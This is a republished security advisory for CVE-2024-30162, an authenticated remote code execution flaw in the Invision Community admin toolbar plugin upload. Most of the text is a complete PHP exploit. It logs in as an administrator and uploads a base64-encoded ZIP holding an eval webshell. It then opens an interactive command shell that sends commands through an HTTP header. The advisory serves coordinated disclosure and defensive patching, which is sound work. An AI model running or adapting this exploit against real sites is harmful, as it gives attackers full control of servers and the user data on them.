Invision Community 4.7.16 Remote Code Execution
2024-4-8 22:8:42 Author: packetstormsecurity.com(查看原文) 阅读量:8 收藏

------------------------------------------------------------------------------
Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability
------------------------------------------------------------------------------

[-] Software Link:

https://invisioncommunity.com

[-] Affected Versions:

Version 4.7.16 and prior versions.

[-] Vulnerability Description:

The vulnerability is located in the
/applications/core/modules/admin/editor/toolbar.php script.
Specifically, into the
IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will
handle
the upload of a ZIP file, trying to extract its content into the
/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if
the ZIP archive does not include
a plugin.js file, then the extracted ZIP content will be recursively
deleted from the file system,
otherwise it will stay there. This can be exploited to execute
arbitrary PHP code by uploading a
ZIP archive containing a plugin.js file (which can also be empty)
along with a PHP file. Successful
exploitation of this vulnerability requires an Administrator account
having the "toolbar_manage" permission.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2024-30162.php

[-] Solution:

No official solution is currently available.

[-] Disclosure Timeline:

[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure
[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed
[20/03/2024] - CVE identifier requested
[24/03/2024] - CVE identifier assigned
[05/04/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2024-30162 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-03

-----------------------
PoC:

<?php

/*
------------------------------------------------------------------------------
Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability
------------------------------------------------------------------------------

author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] Vulnerability Description:

The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.
Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will
handle the upload of a ZIP file, trying to extract its content into the
/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does
not include a plugin.js file, then the extracted ZIP content will be recursively deleted
from the file system, otherwise it will stay there. This can be exploited to execute
arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can
also be empty) along with a PHP file. Successful exploitation of this vulnerability
requires an Administrator account having the "toolbar_manage" permission.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2024-03
*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n");

$url = $argv[1];
$email = $argv[2];
$passwd = $argv[3];
$ch = curl_init();

@unlink('./cookies.txt');

curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');

print "[+] Logging into AdminCP\n";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");
curl_setopt($ch, CURLOPT_POST, false);

if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");

curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");

if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");

print "[+] Uploading malicious ZIP file\n";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");
curl_setopt($ch, CURLOPT_POST, false);

if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");

$plg = md5(time()).".zip";

@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));

$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];

curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");
curl_setopt($ch, CURLOPT_POST, false);

$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";

while(1)
{
print "\ninvision-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}


文章来源: https://packetstormsecurity.com/files/177983/KIS-2024-03.txt
如有侵权请联系:admin#unsafe.sh